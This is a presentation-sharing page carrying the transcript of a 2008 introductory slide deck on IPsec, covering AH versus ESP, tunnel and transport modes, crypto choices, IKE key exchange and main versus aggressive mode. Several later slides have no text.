Ipsec

Download as
 PPT
Presentation Description 

The basic concepts of IPSec

Comments Sign in to comment
By:
 (3 month(s) ago)  
thanks

Embed URL Thumbnail


Custom Embed WordPress Embed

Happy Thanksgiving
What's up on authorSTREAM?
Views: 685
Like it  ( Likes) Dislike it  ( Dislikes)
Added: October 28, 2008 This Presentation is Public 
Presentation Category : Science & Technology All Rights Reserved
Presentation Transcript

IPSec :IPSec By Maggie Zhou Oct, 2008


Basic concepts :2 Basic concepts a suite of protocols for securing network connections network layer, layer 3 IPsec supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection


AH versus ESP :3 AH versus ESP "Authentication Header" (AH) "Encapsulating Security Payload" (ESP) two main wire-level protocols used by IPsec, authenticate (AH) encrypt+authenticate (ESP) the data flowing over that connection. They are typically used independently, though it's possible (but uncommon) to use them both together


Tunnel mode versus Transport mode :4 Tunnel mode versus Transport mode Transport Mode provides a secure connection between two endpoints as it encapsulates IP's payload Tunnel Mode encapsulates the entire IP packet to provide a virtual "secure hop" between two gateways is used to form a traditional VPN, where the tunnel generally creates a secure tunnel across an untrusted Internet


crypto choices :5 crypto choices Setting up an IPsec connection involves all kinds of crypto choices This is simplified substantially by the fact that any given connection can use at most two or (rarely) three at a time MD5 versus SHA-1 versus DES versus 3DES versus AES versus blah blah


IKE versus manual keys :6 IKE versus manual keys how the key data is exchanged. Since both sides of the conversation need to know the secret values used in hashing or encryption, Manual keys require manual entry of the secret values on both ends, presumably conveyed by some out-of-band mechanism IKE (Internet Key Exchange) is a sophisticated mechanism for doing this online


Main mode versus aggressive mode :7 Main mode versus aggressive mode These modes control an efficiency-versus-security tradeoff during initial IKE key exchange. "Main mode" requires six packets back and forth, but affords complete security during the establishment of an IPsec connection Aggressive mode uses half the exchanges providing a bit less security because some information is transmitted in cleartext.


Slide 8:8


AH: Authentication Only :9 AH: Authentication Only


Slide 10:10


Slide 11:11


Slide 12:12


Slide 13:13


Slide 14:14


Slide 15:15


Slide 16:16


Slide 17:17